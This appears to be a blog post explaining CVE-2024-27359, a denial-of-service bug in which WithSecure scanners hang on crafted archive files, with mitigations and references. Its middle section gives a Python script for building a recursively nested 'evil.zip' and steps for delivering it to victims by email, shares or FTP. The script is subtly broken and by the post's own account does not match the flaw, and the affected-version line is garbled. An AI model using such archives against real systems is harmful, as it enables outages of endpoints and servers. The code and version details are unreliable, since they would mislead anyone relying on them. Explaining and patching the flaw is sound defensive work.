In early 2024, a critical security loophole was disclosed: CVE-2024-27359. This vulnerability affects a wide range of WithSecure security products, allowing malicious actors to freeze endpoints and servers simply by scanning a specially crafted archive file. This post will break down in simple terms what the flaw is, how it works, and explain (with examples) why this Denial of Service (DoS) bug is alarming for anyone running WithSecure software.
CVE-2024-27359 is a Denial of Service vulnerability. Here’s how it works, in plain English
- When WithSecure’s security products scan certain maliciously crafted archive files (like ZIP or TAR), their scanning engine enters an infinite loop.
- The product’s scanner never finishes processing the file, causing it to use excessive CPU and system resources. This can make the whole system slow, crash, or become unresponsive—classic DoS.
WithSecure Atlant 1..35-1
If you’ve deployed any of these, you could be at risk!
How Does the Exploit Work?
Let’s make it simple: the attacker only needs to get a vulnerable WithSecure scanner to process a “specially crafted” archive file. No technical hacking skills needed—the vulnerability is all about how the scanner fails to handle a weirdly constructed archive.
Attacker creates a malicious archive file.
This could be a ZIP, RAR, TAR, or similar, with certain properties (like recursive hierarchy or endless file entries).
The scanner hits the bug
The engine gets stuck in an infinite loop, using more and more CPU. Other tasks are starved, and the system can freeze.
Example: How to Create a “Evil” Archive (For Testing)
> ⚠️ *Use this information responsibly and only on systems you own or have explicit permission to test.*
Let’s look at a classic infinite-decompression ZIP example—sometimes called a ZIP Bomb. But for CVE-2024-27359, the archive would be slightly different: it needs to confuse the file iteration logic, not just decompress huge data.
Python snippet to create an archive with recursive structure
import zipfile
import io
def create_recursive_zip(filename, depth=100):
current_file = filename
for i in range(depth):
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
if i == depth - 1:
# Put a harmless file inside the last zip
zf.writestr('hello.txt', 'Hello!')
else:
# Put the next zip file inside this zip
zf.writestr(f'{current_file}', buffer.getvalue())
buffer.seek()
current_file = f'nest_{i}.zip'
# Save the outermost zip
with open(filename, 'wb') as f:
f.write(buffer.getvalue())
create_recursive_zip('evil.zip', depth=100)
> Such a file (with many nested ZIPs or endless directory loops) can trick file scanners into endless recursion.
Prepare the archive: Use the code above or archive tools to make a recursive or malformed ZIP.
2. Deliver to victim: Send via email attachment, place on network share, or sneak onto web/FTP site scanned by WithSecure.
Once the scan begins, system fans spin up, CPU usage spikes.
- Mouse/keyboard slows down, or entire system freezes.
Impact
While this bug does not let an attacker run their code or steal files directly, it gives them a way to take down endpoints or servers without much effort. Imagine an email system brought to a halt because every incoming attachment accidentally sets off the vulnerability.
Mitigations
Official Patch:
WithSecure has released a security advisory (reference here).
Update to the latest version of your product as soon as possible.
Temporary Workarounds (if you can’t patch immediately)
- Block suspicious or unknown archive types via email/security rules.
References
- Official WithSecure Advisory for CVE-2024-27359
- NVD CVE-2024-27359 Entry
- Explaining Archive Bombs on Wikipedia
Conclusion
CVE-2024-27359 is a reminder that even well-designed security products can have simple flaws with big impact. If you control WithSecure software, patch now and be cautious with weird archive files. The good news? This bug doesn’t let hackers in directly, but it can bring services to a grinding halt—sometimes, that’s all a bad actor needs.
Stay safe, keep your security layers patched, and scan wisely!
Timeline
Published on: 02/26/2024 16:28:00 UTC
Last modified on: 08/05/2024 18:35:12 UTC